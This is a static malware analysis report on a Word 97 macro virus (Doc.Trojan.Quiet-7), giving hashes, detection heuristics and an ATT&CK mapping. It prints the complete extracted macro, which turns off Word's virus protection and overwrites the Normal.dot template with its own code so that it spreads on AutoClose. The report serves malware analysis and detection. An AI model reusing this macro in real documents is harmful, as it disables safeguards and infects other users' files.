Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 52c63b70a1932a37…

MALICIOUS

Office (OLE)

26.0 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8c70e9fbc55eeff6602e27a2142ea22d SHA-1: 34683a57d79568f1e48b16893bea6f646a969ac9 SHA-256: 52c63b70a1932a37bdea76a08f81b0a65d4cd993fa25df27e3b3514d82a5be44
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word 97 document containing a WordBasic AutoClose macro. This macro attempts to copy itself into the Normal.dot template, likely to establish persistence or spread to other documents. The macro's intent is to infect the Normal.dot template, as indicated by the code that copies its own lines into the template and replaces the third line with 'Sub AutoClose()'.

Heuristics 4

  • ClamAV: Doc.Trojan.Quiet-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Quiet-7
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 909 bytes
SHA-256: a30eff2a8535594f2807b9b904170e174f8068c78704b191ac36087ceecc0c4a
Detection
ClamAV: Doc.Trojan.Quiet-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Дебилизатор v 4.1  Copyright(c) Slim Fox, 1997 - 2000

Sub AutoClose()
    Options.VirusProtection = False
    On Error GoTo exit_1
    Set ud = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Set nt = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    If ud.Lines(1, 1) = nt.Lines(1, 1) Then GoTo exit_1
    If MacroContainer = "Normal.dot" Then
        Set tm = ud
        Set ud = nt
        Set nt = tm
    End If
    nt.deletelines 1, nt.CountofLines
    Count = ud.CountofLines
    ls = ud.Lines(1, Count)
    nt.InsertLines 1, ls
    nt.replaceline 3, "Sub AutoClose()"
   'sss
exit_1:
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.